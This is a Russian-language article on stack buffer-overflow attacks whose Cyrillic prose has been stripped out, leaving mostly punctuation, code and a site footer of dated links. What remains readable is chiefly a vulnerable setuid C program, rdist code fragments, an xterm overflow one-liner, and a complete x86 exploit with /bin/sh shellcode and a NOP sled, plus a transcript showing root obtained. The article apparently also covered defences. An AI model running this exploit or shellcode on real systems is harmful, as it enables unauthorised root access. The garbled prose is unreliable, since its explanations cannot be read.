,


,
vadim@tversu.ac.ru
1.
2. ,
3. ?
4.
5. ?

, - , , - , , , . , "buffer-overflow" . , , , - , . , "?", "?".

- , "Memory fault - core dumped" "General Protection Fault". , , . , , , , , "" - . - " " . - Unix, - (Windows), MS-DOS, .

. , , 1024 , , . , . , , , . , - , ; , , - "" , .

, "" , , , . ? . , , , , . , , , "buffer-overflow exploits" - , / .

1.

, "rabbit.c":

#include <stdio.h>
#include <string.h>
void process(char*str)
{
        char buffer[256];
        strcpy(buffer, str);
        printf("  = %d\n",
                strlen(buffer));
        return;
}
void main(int argc, 
        char*argv[])
{
        if (argc == 2)
                process(argv[1]);
        else
                printf("Usage: %s some_ 
                string\n", argv[0]);
}

, , strcpy() sprintf(), .

, process(). , ( , ) :

Picture 1

- ( ), . , , - . , , , - , . , , , . , :

Picture 2

? (BP), . , , ( 86):

push bp
mov bp,sp

BP, .

256 . malloc() new , "static", . :

Picture 3

, "strcpy()". , , , , BP, , , , .

, ? strcpy() , - "0", , , RETADR. , - , return(). , RETADR, , , . - , , , - , .

2. ,

, - . , , , REDADR ? return() , . , .

strcpy()?

Picture 4

? -, , , RETADR. , exploit , . -, , 0, - . , , , BP, - , . -, , core dump, , RETADR. , , - - .

, , . , Linux, BSD-family, Solaris, /bin/sh , Internet . , Internet - Solaris.

3. ?

, , . . , ; . , , . "" sendmail, , , .

- . , , , . , , , . / . , - .

, , :

, - .

4.

rdist BSD , . , /usr/bin/rdist, . rdist (setuid bit), root^ shell root.

POP- , - sprintf(). ? , 110- (pop3-) , pop- sprintf() "" shell return(), root. , , root.

finger, , .

, X-Window, , "-display <displayname>" X-. , XFree86 displayname , root- /usr/X11R6/bin/xterm. , Xlib X-.

freebsd-security - - , BSD, SunOS, ( ). , , ?

, exploit- , ( ), , ( BUFFER_SIZE, SKIP_VARS), -.

5. ?

: "" " ".

, UNIX, , . , x86 , , , Sparc MIPS; . , - , .

5.1

, , , . - . buffer-overflow exploits.

- : , (root setuid-; , inetd ..), strcpy, gets, sprintf, , , , , . BUFSIZ, PATH_MAX . , .

1) .

2) strcpy, gets, sprintf etc - strncpy, snprintf, fgets.

3) .

rdist BSD:

struct namelist * lookup(name,
 action, value)
        char *name;
        int action;
        struct namelist *value;
{
        register unsigned n;
        register char *cp;
        register struct syment *s;
        char buf[256];
        . . .
                if (action != INSERT ||
                                s->s_type != CONST) {
                        (void)sprintf(buf, "%s 
                                redefined", name);
                        yyerror(buf);

, buf , . , , "!!!", ( printf , rdist):

if (action != INSERT || 
                s->s_type != CONST) {
        if (strlen(name) > 240)
        {
                printf("The something 
                        going on...\n");
                exit(1);
        }
(void)sprintf(buf, "%s 
        redefined", name);

- : , , . , xterm :

/usr/bin/X11R6/xterm -display `perl "{print "A" x 5000;}"`:0

5000 ( , BUFSIZ, FILENAME_MAX .., /usr/include, 2048 ). / , .

"Memory fault, core dump saved", , , :

1) setuid- , ;

2) ;

3) .

, . , :

for (char *temp = buffer; *buffer; buffer++) *temp++ = *buffer;

, strcpy(). exploit- . , sendmail 8.7.5, GECOS-, BSD chfn, chsh chpass. , , : , / sendmail .

5.2.

, UNIX security, BUGTRAQ, BoS, WDL; CERT (Computer Emergency Response Team), . file:///I:/tppmsgs/msgs102.htm#10239.

, , , ( /var/log/messages). , , .

Unix, . , , MS Word, DOC- ? , , DOS/WIN, , .

, , , , NT . Internet exploit NT, ; , . NT .

- . , , , , . 

#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_OFFSET  50
#define BUFFER_SIZE     256
#define SKIP_VARS       4
/*     */
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
char *ptr = NULL;
int i;
/*     /bin/sh */
char execshell[] = 
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
        "\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b"
        "\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8"
        "\xff\xff\xff/bin/sh\x01\x01\x01\x01\x02\x02\x02\x02"
        "\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
/*   */
buff = malloc(BUFFER_SIZE+16);
if(!buff)
{
        perror("Can"t allocate memory");
        exit(0);
}
ptr = buff;
/*      NOP (" ") */
for (i=0; i < BUFFER_SIZE-strlen(execshell); i++)
        *(ptr++) = 0x90;
/*       */
for (i=0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
/*  ,        */
for (i=0; i < SKIP_VARS; i++)
        *(ptr++) = 0x90;
/*    */
*(long *)ptr = get_esp() + DEFAULT_OFFSET;
ptr += 4;
/*  0 */
*ptr = 0;
/*         */
printf("%s\n", buff);
execl("./rabbit", "rabbit", buff, NULL);
}
   :
# id
uid=0(root) gid=0(wheel)
# gcc -o rabbit rabbit.c
# chmod u+s rabbit
# ls -l rabbit  - , rabbit-root-setuid
-rwsr-xr-x 1 root  wheel 12288 Jan 1 00:01 rabbit
# su user
$ id
uid=200 (user), group = 200 (users)
        -  -  
$ ./rabbit test -   ...
  = 4
$ gcc -o exploit exploit.c      - ...
$ ./exploit     -  exploit,  
  = 264      -  rabbit
# id
uid=200(root) gid=200(users) euid=0(root)
        - -,  !

, - , . , , , .. , . . , " ".




 10.11.2021 - 12:37: - Personalias -> WHO IS WHO - - _.
10.11.2021 - 12:36: - Conscience -> . ? - _.
10.11.2021 - 12:36: , , - Upbringing, Inlightening, Education -> ... - _.
10.11.2021 - 12:35: - Ecology -> - _.
10.11.2021 - 12:34: , - War, Politics and Science -> - _.
10.11.2021 - 12:34: , - War, Politics and Science -> . - _.
10.11.2021 - 12:34: , , - Upbringing, Inlightening, Education -> , - _.
10.11.2021 - 09:18: - New Technologies -> , 5G- - _.
10.11.2021 - 09:18: - Ecology -> - _.
10.11.2021 - 09:16: - Ecology -> - _.
10.11.2021 - 09:15: , , - Upbringing, Inlightening, Education -> - _.
10.11.2021 - 09:13: , , - Upbringing, Inlightening, Education -> - _.
Bourabai Research - XXI Bourabai Research Institution